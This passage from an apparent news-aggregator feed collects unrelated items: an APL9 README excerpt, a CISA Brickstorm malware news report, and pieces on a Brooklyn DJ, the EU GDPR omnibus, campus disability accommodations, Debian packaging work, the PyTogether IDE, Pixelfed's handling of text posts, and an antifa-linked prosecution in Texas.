  • Some of the primitive operators from Dyalog APL
  • Box printing (by default)

For more information, see Implementation Status .

Notable differences from Dyalog APL

  • No bracket axis
  • No bracket indexing
  • No tradfn syntax
  • No complex numbers (might change later)
  • ⍺⍺ is changed to
  • ⍵⍵ is changed to
  • Outer product ∘. is changed to
  • Dop self reference ∇∇ is changed to and for monadic and dyadic operators respectively

Installation

Installation is as simple as cloning and running mk .

git/clone https://git.sr.ht/~pmikkelsen/APL9
cd APL9
mk
% set the BIN environment variable if
% you don't want it to install globally
mk install

The resulting binary is installed as apl . At the time of writing, it doesn't take command line arguments (apart from -t and -m for debugging).

Remember to use a font that can display the glyphs! To be able to write the apl glyphs, a small script is provided with the name aplkeys which works on 9front. Usage is as follows:

% Say my normal kbmap is called dk, but I want to be able to write APL symbols
aplkeys dk

The layout is mostly as the one on X11 on linux, but the way to access the symbols are different. In order to get the "normal" layer, such as ⍺⍳⍵∊* and so on, hold down Mod4 (the windows key) while typing (in this case, typing aiwep). To access the other layer, hold down Mod4 and Alt-gr at the same time, to get ⍶⍸⍹⍷⍣ and so on. Please email me if you have questions about this.

Screenshot

A picture of APL9 in action

CISA warns of Chinese "BrickStorm" malware attacks on VMware servers

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 18:19:55
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware. [...]...
Original Article

Chinese hackers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware.

In a joint malware analysis report with the National Security Agency (NSA) and Canada's Cyber Security Centre, CISA says it analyzed eight Brickstorm malware samples.

These samples were discovered on networks belonging to victim organizations, where the attackers specifically targeted VMware vSphere servers to create hidden rogue virtual machines to evade detection and steal cloned virtual machine snapshots for further credential theft.

As noted in the advisory, Brickstorm uses multiple layers of encryption, including HTTPS, WebSockets, and nested TLS to secure communication channels, a SOCKS proxy for tunneling and lateral movement within compromised networks, and DNS-over-HTTPS (DoH) for added concealment. To maintain persistence, Brickstorm also includes a self-monitoring function that automatically reinstalls or restarts the malware if interrupted.

While investigating one of the incidents, CISA found that Chinese hackers compromised a web server in an organization's demilitarized zone (DMZ) in April 2024, then moved laterally to an internal VMware vCenter server and deployed malware.

The attackers also hacked two domain controllers on the victim's network and exported cryptographic keys after compromising an Active Directory Federation Services (ADFS) server. The Brickstorm implant allowed them to maintain access to the breached systems from at least April 2024 through September 2025.

After obtaining system access, they've also been observed capturing Active Directory database information and performing system backups to steal legitimate credentials and other sensitive data.

Hackers' lateral movement in victim's network
Hackers' lateral movement in the victim's network (CISA)

​To detect the attackers' presence on their networks and block potential attacks, CISA advises defenders (especially those working for critical infrastructure and government organizations) to scan for Brickstorm backdoor activity using agency-created YARA and Sigma rules, and block unauthorized DNS-over-HTTPS providers and external traffic.

They should also take inventory of all network edge devices to monitor for suspicious activity and segment the network to restrict traffic from demilitarized zones to internal networks.

"CISA, NSA, and Cyber Centre urge organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify BRICKSTORM malware samples," the joint advisory urges. "If BRICKSTORM, similar malware, or potentially related activity is detected, CISA and NSA urge organizations to report the activity as required by law and applicable policies."

Today, cybersecurity firm CrowdStrike also linked Brickstorm malware attacks targeting VMware vCenter servers on the networks of U.S. legal, technology, and manufacturing companies throughout 2025 to a Chinese hacking group it tracks as Warp Panda. CrowdStrike observed the same threat group deploying previously unknown Junction and GuestConduit malware implants in VMware ESXi environments.

The joint advisory comes on the heels of a Google Threat Intelligence Group (GTIG) report published in September that described how suspected Chinese hackers used the Brickstorm malware (first documented by Google subsidiary Mandiant in April 2024 ) to gain long-term persistence on the networks of multiple U.S. organizations in the technology and legal sectors.

Google security researchers linked these attacks to the UNC5221 malicious activity cluster, known for exploiting Ivanti zero-days to target government agencies with custom Spawnant and Zipline malware.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

DJ Ushka Wants the Club to Be Your Temple

hellgate
hellgatenyc.com
2025-12-04 18:07:50
DJ and activist Thanushka Yakupitiyage recommends cutting-edge spaces and leftist magazine parties in the next few weeks....
Original Article

Brooklyn-based DJ and immigrant rights and climate activist Thanushka Yakupitiyage , better known as DJ Ushka, builds alternate realities with sets that mix Bollywood and baile funk, bachata, and Shakira.

She performed at this summer's Planet Brooklyn with a soundsystem , a loudspeaker conglomeration that can be heard throughout an entire street party. The practice originated in Kingston, Jamaica, and is typically associated with dancehall and other Caribbean styles of music. (You'll see a lot of them at the West Indian Day Parade .) She told me that the one she used was built by her friend, the musician Anik Khan , in Bangladesh's capital, Dhaka.

Yakupitiyage, who currently works on sustainable policy initiatives at the Surdna Foundation , said she started DJing to be part of queer people of color in New York finding community on the dance floor.

"In 2011, I came into DJing when I was doing immigrant and refugee rights work," Yakupitiyage told me. She is an immigrant herself, originally from Sri Lanka and Thailand, who moved to the U.S. when she was 18 to attend college in Massachusetts. After graduating in 2007, she moved to New York City. "As an immigrant, I've experienced all of the difficulties of what it means to be able to stay in and make New York my home."

As she worked on immigrant support campaigns in the city, she began to see the club as a place of refuge: "I joke that some people go to church or temple, I go to the club."

She quickly realized that while the New York club scene of the 2010s had a dearth of women of color, immigrants, and queer people, that was changing fast. Party producers "with a sort of political analysis based on the issues that I was working on" were popping up, fulfilling, as she put it, "the need for joyful spaces when we live in a really chaotic time."

She cut her teeth at parties like QUE BAJO!? by DJs Uproot Andy and Geko Jones, and queer parties like Azucar; SWEAT, a party run by Khane Kutzwell ; and, eventually Papi Juice, whose organizers she says are now "like family."

Since Yakupitiyage has been working as a multi-disciplinary artist on projects and parties for more than a decade, I asked her what her wildest dreams were for a new era of New York City culture .

"It's very, very difficult to be a full-time artist or DJ in New York," Yakupitiyage said. "I'd like to see the City really think about how they can create opportunities, expand grant opportunities for artists, and incorporate nightlife cultural workers as a part of broader artistic endeavors."

Here's where the DJ who can do it all is partying in the next two weeks:

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

EU's New Digital Package Proposal Promises Red Tape Cuts but Guts GDPR Privacy Rights

Electronic Frontier Foundation
www.eff.org
2025-12-04 18:04:14
The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR). It’s not a done deal, and it shouldn’t be.The GDPR is the most comprehensive model for privacy legislation aro...
Original Article

The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR ) . It’s not a done deal, and it shouldn’t be. The GDPR is the most comprehensive model for privacy legislation around the world. While it is far from perfect and suffers from uneven enforcement, complexities and certain administrative burdens, the omnibus package is full of bad and confusing ideas that, on balance, will significantly weaken privacy protections for users in the name of cutting red tape. It contains at least one good idea: improving consent rules so users can automatically set consent preferences that will apply across all sites. But much as we love limiting cookie fatigue, it’s not worth the price users will pay if the rest of the proposal is adopted. The EC needs to go back to the drawing board if it wants to achieve the goal of simplifying EU regulations without gutting user privacy. Let’s break it down.

Changing What Constitutes Personal Data

The digital package is part of a larger Simplification Agenda to reduce compliance costs and administrative burdens for businesses, echoing the Draghi Report’s call to boost productivity and support innovation. Businesses have been complaining about GDPR red tape since its inception, and new rules are supposed to make compliance easier and turbocharge the development of AI in the EU. Simplification is framed as a precondition for firms to scale up in the EU, ironically targeting laws that were also argued to promote innovation in Europe. It might also stave off tariffs the U.S. has threatened to levy, thanks in part to heavy lobbying from Meta and tech lobbying groups.

The most striking proposal seeks to narrow the definition of personal data, the very basis of the GDPR. Today, information counts as personal data if someone can reasonably identify a person from it, whether directly or by combining it with other information.

The proposal jettisons this relatively simple test in favor of a variable one: whether data is “personal” depends on what a specific entity says it can reasonably do or is likely to do with it. This selectively restates part of a recent ruling by the EU Court of Justice but ignores the multiple other cases that have considered the issue.

This structural move toward entity specific standards will create massive legal and practical confusion, as the same data could be treated as personal for some actors but not for others. It also creates a path for companies to avoid established GDPR obligations via operational restructuring to separate identifiers from other information—a change in paperwork rather than in actual identifiability. What’s more, it will be up to the Commission, a political executive body, to define what counts as unidentifiable pseudonymized data for certain entities.

Privileging AI

In the name of facilitating AI innovation, which often relies on large datasets in which sensitive data may residually appear, the digital package treats AI development as a “legitimate interest,” which gives AI companies a broad legal basis to process personal data, unless individuals actively object. The proposals gesture towards organisational and technical safeguards but leave companies broad discretion.

Another amendment would create a new exemption that allows even sensitive personal data to be used for AI systems under some circumstances. This is not a blanket permission:  “organisational and technical measures” must be taken to avoid collecting or processing such data, and proportionate efforts must be taken to remove them from AI models or training sets where they appear. However, it is unclear what will count as an appropriate or proportionate measures.

Taken together with the new personal data test, these AI privileges mean that core data protection rights, which are meant to apply uniformly, are likely to vary in practice depending on a company’s technological and commercial goals.

And it means that AI systems may be allowed to process sensitive data even though non-AI systems that could pose equal or lower risks are not allowed to handle it .

A Broad Reform Beyond the GDPR

There are additional adjustments, many of them troubling, such as changes to rules on automated-decision making (making it easier for companies to claim it’s needed for a service or contract), reduced transparency requirements (less explanation about how users’ data are used), and revised data access rights (supposed to tackle abusive requests). An extensive analysis by NGO noyb can be found here .

Moreover, the digital package reaches well beyond the GDPR, aiming to streamline Europe’s digital regulatory rulebook, including the e-Privacy Directive, cybersecurity rules, the AI Act and the Data Act. The Commission also launched “reality checks ” of other core legislation, which suggests it is eyeing other mandates.

Browser Signals and Cookie Fatigue

There is one proposal in the Digital Omnibus that actually could simplify something important to users: requiring online interfaces to respect automated consent signals, allowing users to automatically reject consent across all websites instead of clicking through cookie popups on each. Cookie popups are often designed with “dark patterns” that make rejecting data sharing harder than accepting it. Automated signals can address cookie banner fatigue and make it easier for people to exercise their privacy rights.

While this proposal is a step forward, the devil is in the details: First, the exact format of the automated consent signal will be determined by technical standards organizations where Big Tech companies have historically lobbied for standards that work in their favor. The amendments should therefore define minimum protections that cannot be weakened later.

Second, the provision takes the important step of requiring web browsers to make it easy for users sending this automated consent signal, so they can opt-out without installing a browser add-on.

However, mobile operating systems are excluded from this latter requirement, which is a significant oversight. People deserve the same privacy rights on websites and mobile apps.

Finally, exempting media service providers altogether creates a loophole that lets them keep using tedious or deceptive banners to get consent for data sharing. A media service’s harvesting of user information on its website to track its customers is distinct from news gathering, which should be protected.

A Muddled Legal Landscape

The Commission’s use of the "Omnibus" process is meant to streamline lawmaking by bundling multiple changes. An earlier proposal kept the GDPR intact, focusing on easing the record-keeping obligation for smaller businesses—a far less contentious measure. The new digital package instead moves forward with thinner evidence than a substantive structural reform would require, violating basic Better Regulation principles, such as coherence and proportionality.

The result is the opposite of “simple.” The proposed delay of the high-risk requirements under the AI Act to late 2027—part of the omnibus package—illustrates this: Businesses will face a muddled legal landscape as they must comply with rules that may soon be paused and later revived again. This sounds like "complification” rather than simplification.

The Digital Package Is Not a Done Deal

Evaluating existing legislation is part of a sensible legislative cycle and clarifying and simplifying complex process and practices is not a bad idea. Unfortunately, the digital package misses the mark by making processes even more complex, at the expense of personal data protection.

Simplification doesn't require tossing out digital rights. The EC should keep that in mind as it launches its reality check of core legislation such as the Digital Services Act and Digital Markets Act, where tidying up can too easily drift into a verschlimmbessern , the kind of well-meant fix that ends up resembling the infamous ecce homo restoration .

Why Are 38 Percent of Stanford Students Saying They're Disabled?

Hacker News
reason.com
2025-12-04 18:04:07
Comments...
Original Article

The students at America's elite universities are supposed to be the smartest, most promising young people in the country. And yet, shocking percentages of them are claiming academic accommodations designed for students with learning disabilities.

In an article published this week in The Atlantic, education reporter Rose Horowitch lays out some shocking numbers. At Brown and Harvard, 20 percent of undergraduate students are disabled. At Amherst College, that's 34 percent. At Stanford University, it's a galling 38 percent. Most of these students are claiming mental health conditions and learning disabilities, like anxiety, depression, and ADHD.

Obviously, something is off here. The idea that some of the most elite, selective universities in America—schools that require 99th percentile SATs and sterling essays—would be educating large numbers of genuinely learning disabled students is clearly bogus. A student with real cognitive struggles is much more likely to end up in community college, or not in higher education at all, right?

The professors Horowitz interviewed largely back up this theory. "You hear 'students with disabilities' and it's not kids in wheelchairs," one professor told Horowitch. "It's just not. It's rich kids getting extra time on tests." Talented students get to college, start struggling, and run for a diagnosis to avoid bad grades. Ironically, the very schools that cognitively challenged students are most likely to attend—community colleges—have far lower rates of disabled students, with only three to four percent of such students getting accommodations.

To be fair, some of the students receiving these accommodations do need them. But the current language of the Americans with Disabilities Act (ADA) allows students to get expansive accommodations with little more than a doctor's note.

While some students are no doubt seeking these accommodations as semi-conscious cheaters, I think most genuinely identify with the mental health condition they're using to get extra time on tests. Over the past few years, there's been a rising push to see mental health and neurodevelopmental conditions as not just a medical fact, but an identity marker. Will Lindstrom, the director of the Regents' Center for Learning Disorders at the University of Georgia, told Horowitch that he sees a growing number of students with this perspective. "It's almost like it's part of their identity," Lindstrom told her. "By the time we see them, they're convinced they have a neurodevelopmental disorder."

What's driving this trend? Well, the way conditions like ADHD, autism, and anxiety get talked about online—the place where most young people first learn about these conditions—is probably a contributing factor. Online creators tend to paint a very broad picture of the conditions they describe. A quick scroll of TikTok reveals creators labeling everything from always wearing headphones , to being bad at managing your time , to doodling in class as a sign that someone may have a diagnosable condition. According to these videos, who isn't disabled?

The result is a deeply distorted view of "normal." If ever struggling to focus or experiencing boredom is a sign you have ADHD, the implication is that a "normal," nondisabled person has essentially no problems. A "neurotypical" person, the thinking goes, can churn out a 15-page paper with no hint of procrastination, maintain perfect focus during a boring lecture, and never experience social anxiety or awkwardness. This view is buffeted by the current way many of these conditions are diagnosed. As Horowitch points out, when the latest issue of the DSM , the manual psychiatrists use to diagnose patients, was released in 2013, it significantly lowered the bar for an ADHD diagnosis. When the definition of these conditions is set so liberally, it's easy to imagine a highly intelligent Stanford student becoming convinced that any sign of academic struggle proves they're learning disabled, and any problems making friends are a sign they have autism.

Risk-aversion, too, seems like a compelling factor driving bright students to claim learning disabilities. Our nation's most promising students are also its least assured. So afraid of failure—of bad grades, of a poorly-received essay—they take any sign of struggle as a diagnosable condition. A few decades ago, a student who entered college and found the material harder to master and their time less easily managed than in high school would have been seen as relatively normal. Now, every time she picks up her phone, a barrage of influencers is clamoring to tell her this is a sign she has ADHD. Discomfort and difficulty are no longer perceived as typical parts of growing up.

In this context, it's easy to read the rise of academic accommodations among the nation's most intelligent students as yet another manifestation of the risk-aversion endemic in the striving children of the upper middle class. For most of the elite-college students who receive them, academic accommodations are a protection against failure and self-doubt. Unnecessary accommodations are a two-front form of cheating—they give you an unjust leg-up on your fellow students, but they also allow you to cheat yourself out of genuine intellectual growth. If you mask learning deficiencies with extra time on texts, soothe social anxiety by forgoing presentations, and neglect time management skills with deadline extensions, you might forge a path to better grades. But you'll also find yourself less capable of tackling the challenges of adult life.

Colin Watson: Free software activity in November 2025

PlanetDebian
www.chiark.greenend.org.uk
2025-12-04 17:55:59
My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year. You can also support my work directly via Liberapay or GitHub Sponsors. Open...
Original Article

My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year.

You can also support my work directly via Liberapay or GitHub Sponsors .

OpenSSH

I began preparing for the second stage of the GSS - API key exchange package split (some details have changed since that message). It seems that we’ll need to wait until Ubuntu 26.04 LTS has been released, but that’s close enough that it’s worth making sure we’re ready. This month I just did some packaging cleanups that would otherwise have been annoying to copy, such as removing support for direct upgrades from pre-bookworm. I’m considering some other package rearrangements to make the split easier to manage, but haven’t made any decisions here yet.

This also led me to start on a long-overdue bug triage pass, mainly consisting of applying usertags to lots of our open bugs to sort them by which program they apply to, and also closing a few that have been fixed, since some bugs will eventually need to be reassigned to GSS - API packages and it would be helpful to make them easier to find. At the time of writing, about 30% of the bug list remains to be categorized this way.

Python packaging

I upgraded these packages to new upstream versions:

I packaged django-pgtransaction and backported it to trixie, since we plan to use it in Debusine; and I adopted python-certifi for the Python team.

I fixed or helped to fix several other build/test failures:

I fixed a couple of other bugs:

Other bits and pieces

Code reviews

Comments

With an account on the Fediverse or Mastodon, you can respond to this post . Since Mastodon is decentralized, you can use your existing account hosted by another Mastodon server or compatible platform if you don't have an account on this one. Known non-private replies are displayed below.

Learn how this is implemented here .

PyTogether: Collaborative lightweight real-time Python IDE for teachers/learners

Hacker News
github.com
2025-12-04 17:43:07
Comments...
Original Article

Logo
PyTogether
Google docs for Python. A fully browser-based collaborative Python IDE with real-time editing, chat, and visualization.

pytogether.org

( https://pytogether.org/ )

Features

  • Real-time Collaboration - Edit Python code together instantly using Y.js.
  • Secure Authentication - Log in manually or with Google OAuth.
  • Groups & Projects - Organize your work into teams and projects.
  • Live Drawings - Draw directly on the IDE to assist with note-taking or teaching.
  • Live Cursors/Selections - Google docs-like live selections for smoother collaboration.
  • Live Chat and Voice Calls - Real-time messaging, and Discord-like voice chats for each project.
  • Code Linting - Integrated CodeMirror linting for cleaner, error-free code.
  • Smart Autosave - Code is automatically saved every minute and on exit.

Demo

Drawing Demo


About

When starting out in programming, many beginners find traditional IDEs overwhelming: full of plugins, extensions, configuration steps, paywalls, and complex UIs. PyTogether removes these barriers by offering a lightweight, distraction-free environment where you can focus on writing Python code right away.

The platform is designed for learning, teaching, and pair programming , making it ideal for classrooms, coding clubs, or quick collaborations.

Note: PyTogether is intended for educational purposes and beginner use. It is not optimized for large-scale production development.

Why PyTogether?

While there are many online IDEs (Replit, Jupyter, Google Colab, etc.), PyTogether is built with a different goal: simplicity first .

  • Instant Setup ⚡- No downloads, no pip installs, no hidden complexity. Just create a group, create a project, and bam!
  • Beginner Focused - No confusing menus, terminals, or configuration. Just code and run.
  • Real-Time Collaboration - Work together with classmates, friends, or mentors in the same editor.
  • Safe Learning Space - Limited features by design to reduce distractions and keep beginners focused.

Unlike production-grade IDEs, PyTogether prioritizes ease of use and collaboration for learners rather than advanced features.

Technologies

  • Backend : Django, Django REST Framework (DRF)
  • Real-Time : Y.js, WebSockets (Django Channels)
  • Async Processing : Celery
  • Data Store : PostgreSQL (via Supabase)
  • Caching, Broker, & Channel layers : Redis
  • Frontend : React, Tailwind CSS, CodeMirror (code linting)
  • Python Execution : Pyodide (via Web Worker)
  • Deployment : Vercel (Frontend), Docker on VPS (Backend), Nginx (reverse proxy)
  • CI/CD : GitHub Actions (deploy backend to VPS on push to main)

Contributing & Local Setup

  • Requirements: Docker, Node

Running PyTogether locally is a simple two-step process. Run the following commands from the project root:

# 1. Install all dependencies (automatically does it for root and frontend)
npm install

# 2. Start the servers
npm run dev

This will install all required packages and run the backend container and start the frontend. It should take around 2-5 minutes on initial launch. The frontend will be live on http://localhost:5173 . You can do CTRL+C to stop the program/containers.

Note Two superusers are created automatically:

  • Email: test1@gmail.com
  • Email: test2@gmail.com

Both have the password testtest . You can log in with them on the frontend.

You may also adjust the settings in backend/backend/settings/dev.py

Author

Jawad Rizvi

Applied Mathematics & Computer Engineering student at Queen's University.

Is Pixelfed sawing off the branch that the Fediverse is sitting on?

Lobsters
ploum.net
2025-12-04 17:30:01
Comments...
Original Article

by Ploum on 2025-12-04

In January 2025, I became aware that there was a real problem with Pixelfed, the "Instagram inspired Fediverse client". The problem is threatening the whole Fediverse. As Pixelfed received a lot of media attention, I choose to wait. In March 2025, I decided that the situation was quieter and wrote an email to Dansup, Pixelfed’s maintainer, with an early draft of this post. Dan’s promptly replied, in a friendly tone. But didn’t want to acknowledge the problem which I’ve confirmed many times with Pixelfed users. I want to bring the debate on the public place. If I’m wrong, I will at least understand why. If Dan is wrong on this very specific issue, we will at least open the debate.

This post will be shared to my Fediverse audience through my @ploum@mamot.fr Mastodon account. But Pixelfed users will not see it. Even if they follow me, even if many people they follow boost it. Instead, they will see a picture of my broken keyboard that I posted a week ago.

The latest post of Ploum according to Pixelfed.
The latest post of Ploum according to Pixelfed.

That’s because, despite its name, Pixelfed is NOT a true Fediverse application. It does NOT respect the ActivityPub protocol. Any Pixelfed user following my @ploum@mamot.fr will only see a very small fraction of what I post. They may not see anything from me for months.

But why? Simple! The Pixelfed app has unilaterally decided not to display most Fediverse posts for the arbitrary reason that they do not contain a picture.

This is done on purpose and by design. Pixelfed is designed to mimic Instagram. Displaying text without pictures was deliberately removed from the code (it was possible in previous versions) in order to make the interface prettier.

This is unlike a previous problem where Pixelfed would allow unauthorised users to read private posts from unknowing fediverse users, which was promptly fixed.

In this case, we are dealing with a conscious design decision by the developers. Being pretty is more important than transmitting messages.

Technically, this means that a Pixelfed user P will think that he follows someone but will miss most of the content. On the opposite, the sender, for example a Mastodon user M, will believe that P has received his message because M follows him.

This is a grave abuse of the protocol: messages are silently dropped. It stands against everything the Fediverse is trying to do: allow users to communicate. My experience with open protocols allows me to say that it is a critical problem and that it cannot be tolerated. Would you settle for a mail provider which silently drop all emails you receive if they contain the letter "P"?

The principle behind a communication protocol is to create trust that messages are transmitted. Those messages could, of course, be filtered by the users but those filters should be manually triggered and always removable. If a message is not delivered, the sender should be notified.

In 2025, I’ve read several articles about people trying the Fediverse but leaving it because "there’s not enough content despites following lot of people". Due to the Pixelfed buzz in January, I’m now wondering: "how many of those people were using Pixelfed and effectively missing most of the Fediverse content?"

The importance of respecting the protocol

I cannot stress enough how important that problem is.

If Pixelfed becomes a significant actor, its position will gravely undermine the ActivityPub protocol to the point of making it meaningless.

Imagine a new client, TextFed, that will never display posts with pictures. That makes as much sense as the opposite. Lots of people, like me, find pictures disturbing and some people cannot see pictures at all. So TextFed makes as much sense as Pixelfed. Once you have TextFed, you realise that TextFed and PixelFed users can follow each other, they can comment on post from Mastodon users, they can exchange private messages but they will never be able to see post from each other.

For any normal users, there’s no real way to understand that they miss some messages. And even if you do, it is very hard to find that the cause is the absence of pictures in them make them "not pretty enough" to Pixelfed developers. Worse of all : some Mastodon posts do contain a picture but are not displayed in Pixelfed. That’s because the picture is from a link preview and was not manually uploaded. Try to explain that to your friends that reluctantly followed you on the Fediverse. Have a look at any Mastodon account and try to guess which posts will we showed to the Pixelfed followers!

That’s not something any normal human is supposed to understand. For Pixelfed users, there’s no way to see they are missing on some content. For Mastodon users, there’s no way to see that some of their audience is missing on some content.

With the trust in the protocol broken, people will revert to create Mastodon accounts to follow Mastodon, Pixelfed accounts to follow Pixelfed and Textfed to follow Textfed. Even if it is not 100% needed, that’s the first intuition. It’s already happening around me: I’ve witnessed multiple people with a Mastodon account creating a Pixelfed account to follow Pixelfed users. They do this naturally because they were used to do that with Twitter and Instagram.

Congratulations, you have successfully broken ActivityPub and, as a result, the whole Fediverse. What Meta was not able to do with Threads, the Fediverse did it to itself. Because it was prettier.

Pixelfed will be forced to comply anyway

Now, imagine for a moment that Pixelfed takes off (which is something I wish for and would be healthy for the Fediverse) and that interactions are strong between Mastodon users and Pixelfed users (also something I wish for). I let you imagine how many bug reports developers will receive about "some posts are not appearing in my followers timeline" or "not appearing in my timeline".

This will result in a heavy pressure for Pixelfed devs to implement text-only messages. They will, at some point, be forced to comply, having eroded trust in the Fediverse for nothing.

Once a major actor in a decentralised network starts to mess with the protocol, there are only two possible output: either that actor lose steam or that actor becomes dominant enough to impose its own vision of the protocol. In fact, there’s a third option: the whole protocol becomes irrelevant because nobody trust it anymore.

What if Pixelfed becomes dominant?

But imagine that Pixelfed is now so important that they can stick to their guns and refuse to display text messages.

Well, there’s a simple answer: every other fediverse software will now add an image with every post. Mastodon will probably gain a configurable "default picture to attach to every post so your posts are displayed in Pixelfed".

And now, without having formerly formalised it, the ActivityPub protocol requires every message to have a picture.

That’s how protocol works. It already happened: that’s how all mail clients started to implement the winmail.dat bug.

Sysadmins handling storage and bandwidth for the Fediverse thank you in advance.

We are not there yet

Fortunately, we are not there yet. Pixelfed is still brand new. It still can go back to displaying every message an end user expect to see when following another Fediverse user.

I stress out that it should be by default, not a hidden setting. Nearly all Pixelfed users I’ve asked were unaware of that problem. They thought that if they follow someone on the Fediverse, they should, by default, see all their public posts.

There’s no negotiation. No warning on the Pixelfed website will be enough. In a federated communication system, filters should be opt-in. If fact, that’s what older versions of Pixelfed were doing.

But, while text messages MUST be displayed by default (MUST as in RFC), they can still me displayed as less important. For example, one could imagine having them smaller or whatever you find pretty as long as it is clear that the message is there. I trust Pixelfed devs to be creative here.

The Fediverse is growing. The Fediverse is working well. The Fediverse is a tool that we urgently need in those trying times. Let’s not saw off the branch on which we stand when we need it the most.

UPDATE: Dansup, Pixelfed Creator, replied the following on Mastodon:

We are working on several major updates, and while I believe that Pixelfed should only show photo posts, that decision should be up to each user, which we are working to support.

I’m Ploum , a writer and an engineer. I like to explore how technology impacts society. You can subscribe by email or by rss . I value privacy and never share your adress.

I write science-fiction novels in French . For Bikepunk , my new post-apocalyptic-cyclist book, my publisher is looking for contacts in other countries to distribute it in languages other than French. If you can help, contact me !

Alleged Antifa Cell Member Says He Was Accidentally Released, Turns Himself In: “I’m Not Hiding. Because I’m Innocent.”

Intercept
theintercept.com
2025-12-04 17:26:10
In an exclusive interview, Daniel Sanchez Estrada speaks about being arrested for transporting anarchist zines after a protest against ICE in Texas. The post Alleged Antifa Cell Member Says He Was Accidentally Released, Turns Himself In: “I’m Not Hiding. Because I’m Innocent.” appeared first on The ...
Original Article

For five months, Daniel Sanchez Estrada was the prisoner of a government that has branded him an “ Antifa Cell operative .” He was accused of moving a box of anarchist zines from one suburb of Dallas to another after a protest against U.S. Immigration and Customs Enforcement.

On the day before Thanksgiving, he was released without warning or explanation. He walked out to a jail parking lot relishing the fresh air — and watching over his shoulder.

During the week that followed, Sanchez Estrada savored his time with family members and worried that his release might have been an accident. Apparently, he was right.

“I just have to go through this process. It’s necessary to show that I’m not the person they say I am.”

On Thursday, Sanchez Estrada turned himself in to await a trial that could be months away.

It was another swerve in the case of a man who has been demonized by the federal government for actions he took after a protest against Donald Trump’s immigration crackdown . Civil liberties advocates have decried the case against him as “guilt by literature.” (The U.S Attorney’s Office for the Northern District of Texas declined to comment and the Federal Bureau of Prisons did not immediately respond to a request.)

In a Wednesday night interview during his final hours of freedom, Sanchez Estrada said the decision to voluntarily surrender himself was gut-wrenching.

“As scary as it is, I’m innocent,” he said. “I just have to go through this process. It’s necessary to show that I’m not the person they say I am. I’m not fleeing. I’m not hiding. Because I’m innocent. I haven’t done anything.”

Sanchez Estrada spoke to The Intercept outside an ice cream shop in an upscale shopping mall in Fort Worth, Texas. He was set to turn himself back into jail 16 hours after the interview — but before that, he was treating his 12-year-old stepdaughter to sweets during his first meeting with her as a free man since his arrest in July.

Prairieview Protest

Prosecutors allege that Sanchez Estrada’s wife, Maricela Rueda, attended a chaotic protest outside ICE’s Prairieland Detention Center on July 4 that ended with a police officer wounded by gunfire. A separate defendant is the sole person accused of firing a gun at the officer.

The gathering outside the Alvarado, Texas, detention center happened in the context of huge rise in the number of immigrants detained under Trump , from 39,000 in January to 65,000 in November, which has been accompanied by reports of dire conditions inside .

Supporters of the Prairieland defendants say the protesters hoped to cause a ruckus with fireworks in a show of solidarity. The government has accused members of what it dubs the “North Texas antifa cell” of rioting and attempted murder.

No one claims that Sanchez Estrada was present at the protest. Instead, he is accused of moving anarchist zines from his parents’ house to another residence near Dallas on July 6 after Rueda called him from jail. Sanchez Estrada was arrested when the move was spotted by an FBI surveillance team, according to the government.

“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork.”

Prosecutors said the zines contained “anti-law enforcement, anti-government and anti-Trump sentiments.” In a statement made outside of his interview, Sanchez Estrada said that possession of such items is clearly protected by the First Amendment.

“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork,” Sanchez Estrada said. “Items that should be protected under the First Amendment ‘freedom of speech.’ If this is happening to me now, it’s only a matter of time before it happens to you.”

Civil liberties groups such as the Freedom of the Press Foundation have denounced his case as “ guilt by literature.” They warn that his could be the first of many such prosecutions in the wake of a presidential memo from Trump targeting “antifa” and other forms of “ anti-Americanism .”

The purported “North Texas antifa cell” has been cited by FBI Director Kash Patel and others as a prime example of a supposed surge in the number of attacks on ICE officers — although a recent Los Angeles Times analysis found that unlike the incident in Texas, most of those alleged attacks resulted in no injury.

Sanchez Estrada faces up to 20 years on counts of corruptly concealing a document or record and conspiracy to conceal documents. The stakes are higher for him than other defendants because he is a green card holder, which ICE spotlighted in a social media post that included his picture and immigration history.

“I Did Not Participate”

Sanchez Estrada also worries about the fate of his wife, who faces life imprisonment if convicted. She pleaded not guilty in an arraignment Wednesday. The case is currently set for trial on January 20.

“I want to be very clear. I did not participate. I was not aware nor did I have any knowledge about the events that transpired on July 4 outside the Prairieland Detention Center,” Sanchez Estrada said in his statement. “My feeling is that I was only arrested because I’m married to Mari Rueda, who is being accused of being at the noise demo showing support to migrants who are facing deportation under deplorable conditions.”

Sanchez Estrada said that he spent his months in jail anguishing over how his stepdaughter would be affected and how his parents, for whom he is the primary supporter, would make ends meet.

A nature lover who peppers his speech with references to “the creator,” for Sanchez Estrada one of the toughest things about being in jail was not being able to breathe fresh air or watch the sun set.

He said he was immediately suspicious when jail officers told him that he was being released.

“I thought they would be waiting in the parking lot to arrest me.”

“You normally would assume the worst when you’re in there. I just did not believe them. I thought they would be waiting in the parking lot to arrest me,” he said.

Soon, however, Sanchez Estrada was eating vegan tacos and spending time with friends and family.

“It is something just beautiful to see — everyone rooting for you,” he said.

He fears what could happen when he returns to custody. Still, he will have a reminder of his brief return to life on the outside: freshly inked tattoos of a raccoon and an opossum.

“They’ve been here even before people,” he said. “They’re wild animals, and they’re beautiful.”

Update: December 4, 2025, 12:58 p.m. ET
This story has been updated to reflect that, after publication, the U.S Attorney’s Office for the Northern District of Texas declined to comment.

Functional Quadtrees
